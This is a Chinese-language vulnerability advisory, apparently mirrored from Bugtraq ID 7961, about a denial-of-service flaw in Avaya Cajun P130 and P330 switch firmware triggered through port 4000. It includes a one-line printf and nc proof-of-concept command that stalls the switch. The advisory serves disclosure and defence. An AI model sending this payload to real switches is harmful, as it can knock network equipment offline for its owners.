发布日期：2003-06-18
更新日期：2003-06-25

受影响系统：

AVAYA Cajun P130 Series Firmware 2.9.1
AVAYA Cajun P130 Series Firmware 2.6.1
AVAYA Cajun P330 Series Firmware 3.9.1
AVAYA Cajun P330 Series Firmware 3.8.2
AVAYA Cajun P330 Series Firmware 3.8.1
AVAYA Cajun P330 Series Firmware 3.12.1
AVAYA Cajun P330 Series Firmware 3.12
AVAYA Cajun P330 Series Firmware 3.11
AVAYA Cajun P330 Series Firmware 3.10

描述：

---

BUGTRAQ  ID: 7961

Avaya Cajun提供多业务网络交换机系统解决方案。

Avaya Cajun交换机不正确处理经过4000端口的不正常通信，远程攻击者可以用这个漏洞使交换机延迟停顿一段时间。

通过连接交换机4000端口，发送前4个字节代表一个负数，超过5字节的包，可导致交换机延迟一段时间，多个此类包可导致交换机停止工作，产生拒绝服务。

<*来源：Jacek Lipkowski （sq5bpf@andra.com.pl）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105595189813418&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Jacek Lipkowski （sq5bpf@andra.com.pl）提供了如下测试方法：

sq5bpf@hash:~$ printf "\x80dupa"|nc -v -v -v -n 192.168.66.3 4000
(UNKNOWN) [192.168.66.3] 4000 (?) open
[the connections stalls]

建议：

---

厂商补丁：

AVAYA
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://support.avaya.com/security/

浏览次数：2741
严重程度：0（网友投票）